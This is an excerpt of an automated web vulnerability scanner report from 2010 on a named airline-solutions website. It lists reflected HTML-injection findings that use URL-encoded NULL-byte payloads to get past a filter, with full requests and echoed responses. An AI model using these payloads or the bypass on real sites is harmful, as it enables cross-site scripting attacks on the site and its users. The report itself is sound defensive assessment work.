<a href="/home/news_events/events/?%00dab69"><a>b2f5fb7df3c=1">
...[SNIP]...

3.116. http://www.sabreairlinesolutions.com/home/news_events/news [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/news_events/news

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %0014294<a>0ea98cb94ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 14294<a>0ea98cb94ed in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/news_events/news?%0014294<a>0ea98cb94ed=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321531; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A3%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A4%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:36:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321531; expires=Thu, 06-Oct-2011 09:36:56 GMT; path=/
Set-Cookie: exp_last_activity=1286375816; expires=Thu, 06-Oct-2011 09:36:56 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fnews_events%2Fnews%2F%22%3Bi%3A1%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A4%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:37:03 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a>0ea98cb94ed=1">news?%0014294<a>0ea98cb94ed=1</a>
...[SNIP]...

3.117. http://www.sabreairlinesolutions.com/home/news_events/news [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/news_events/news

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0026cff"><a>7455c9888f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 26cff"><a>7455c9888f8 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/news_events/news?%0026cff"><a>7455c9888f8=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321531; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A3%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A4%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:31:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321531; expires=Thu, 06-Oct-2011 09:31:46 GMT; path=/
Set-Cookie: exp_last_activity=1286375505; expires=Thu, 06-Oct-2011 09:31:46 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fnews_events%2Fnews%2F%22%3Bi%3A1%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A4%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:32:11 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13022

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="/home/news_events/news?%0026cff"><a>7455c9888f8=1">
...[SNIP]...

3.118. http://www.sabreairlinesolutions.com/home/news_events/news/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/news_events/news/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0056b62"><a>45a3e4cc837 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 56b62"><a>45a3e4cc837 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/news_events/news/?%0056b62"><a>45a3e4cc837=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 20:06:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1286327206; expires=Wed, 05-Oct-2011 20:06:46 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fnews_events%2Fnews%2F%22%3Bi%3A1%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 20:06:56 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13066

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="/home/news_events/news/?%0056b62"><a>45a3e4cc837=1">
...[SNIP]...

3.119. http://www.sabreairlinesolutions.com/home/products_services [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d6be4"><a>c4f7a80bf90 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d6be4"><a>c4f7a80bf90 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services?%00d6be4"><a>c4f7a80bf90=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 17:03:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1286316204; expires=Wed, 05-Oct-2011 17:03:24 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 17:03:38 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 22922


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/products_services?%00d6be4"><a>c4f7a80bf90=1">
...[SNIP]...

3.120. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/downloads/images [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/airline_reservations/downloads/images

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0051ca8"><a>bab4ffaf8c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 51ca8"><a>bab4ffaf8c9 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/airline_reservations/downloads/images?%0051ca8"><a>bab4ffaf8c9=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/downloads/images/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323079; __utmb=178985382.1.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 06:36:03 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286323079; expires=Thu, 06-Oct-2011 06:36:05 GMT; path=/
Set-Cookie: exp_last_activity=1286364964; expires=Thu, 06-Oct-2011 06:36:05 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A57%3A%22%2Fproducts_services%2Fairline_reservations%2Fdownloads%2Fimages%2F%22%3Bi%3A1%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A2%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 06:36:44 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 20199


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<a href="/home/products_services/airline_reservations/downloads/images?%0051ca8"><a>bab4ffaf8c9=1">
...[SNIP]...

3.121. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/downloads/images [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/airline_reservations/downloads/images

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00aa1d2<a>e23a0079847 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as aa1d2<a>e23a0079847 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/airline_reservations/downloads/images?%00aa1d2<a>e23a0079847=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/downloads/images/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323079; __utmb=178985382.1.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 06:41:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286323079; expires=Thu, 06-Oct-2011 06:42:01 GMT; path=/
Set-Cookie: exp_last_activity=1286365320; expires=Thu, 06-Oct-2011 06:42:01 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A57%3A%22%2Fproducts_services%2Fairline_reservations%2Fdownloads%2Fimages%2F%22%3Bi%3A1%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A2%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 06:42:50 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 20195


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<a>e23a0079847=1">images?%00aa1d2<a>e23a0079847=1</a>
...[SNIP]...

3.122. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/downloads/images/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/airline_reservations/downloads/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %006e97a"><a>667bede4c97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6e97a"><a>667bede4c97 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/airline_reservations/downloads/images/?%006e97a"><a>667bede4c97=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323079; __utmb=178985382.1.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 06:06:03 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286323079; expires=Thu, 06-Oct-2011 06:06:25 GMT; path=/
Set-Cookie: exp_last_activity=1286363185; expires=Thu, 06-Oct-2011 06:06:25 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A57%3A%22%2Fproducts_services%2Fairline_reservations%2Fdownloads%2Fimages%2F%22%3Bi%3A1%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A2%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 06:06:32 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 20282


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<a href="/home/products_services/airline_reservations/downloads/images/?%006e97a"><a>667bede4c97=1">
...[SNIP]...

3.123. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/downloads/images/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/airline_reservations/downloads/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %0080152<a>de13aac6848 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 80152<a>de13aac6848 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/airline_reservations/downloads/images/?%0080152<a>de13aac6848=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323079; __utmb=178985382.1.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 06:11:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286323079; expires=Thu, 06-Oct-2011 06:11:47 GMT; path=/
Set-Cookie: exp_last_activity=1286363507; expires=Thu, 06-Oct-2011 06:11:47 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A57%3A%22%2Fproducts_services%2Fairline_reservations%2Fdownloads%2Fimages%2F%22%3Bi%3A1%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A2%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 06:12:24 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 20278


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<a>de13aac6848=1">?%0080152<a>de13aac6848=1</a>
...[SNIP]...

3.124. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/more_customers/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/airline_reservations/more_customers/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f85dc"><a>dfdeaf77316 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f85dc"><a>dfdeaf77316 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/airline_reservations/more_customers/?%00f85dc"><a>dfdeaf77316=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323016; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A60%3A%22%2Fproducts_services%2Fcommercial_planning%2Fairvision_technology%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts_services%2Fproduct%2Fweb_services%2F%22%3Bi%3A2%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Finteract_interface%2F%22%3Bi%3A3%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_slot_manager_iata%2F%22%3Bi%3A4%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_codeshare_manager%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 06:10:03 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286323016; expires=Thu, 06-Oct-2011 06:10:05 GMT; path=/
Set-Cookie: exp_last_activity=1286363404; expires=Thu, 06-Oct-2011 06:10:05 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A55%3A%22%2Fproducts_services%2Fairline_reservations%2Fmore_customers%2F%22%3Bi%3A1%3Bs%3A60%3A%22%2Fproducts_services%2Fcommercial_planning%2Fairvision_technology%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts_services%2Fproduct%2Fweb_services%2F%22%3Bi%3A3%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Finteract_interface%2F%22%3Bi%3A4%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_slot_manager_iata%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 06:11:05 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 33498


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<a href="/home/products_services/airline_reservations/more_customers/?%00f85dc"><a>dfdeaf77316=1">
...[SNIP]...

3.125. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/more_customers/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/airline_reservations/more_customers/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %009bfb0<a>05937178652 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9bfb0<a>05937178652 in the application's response.

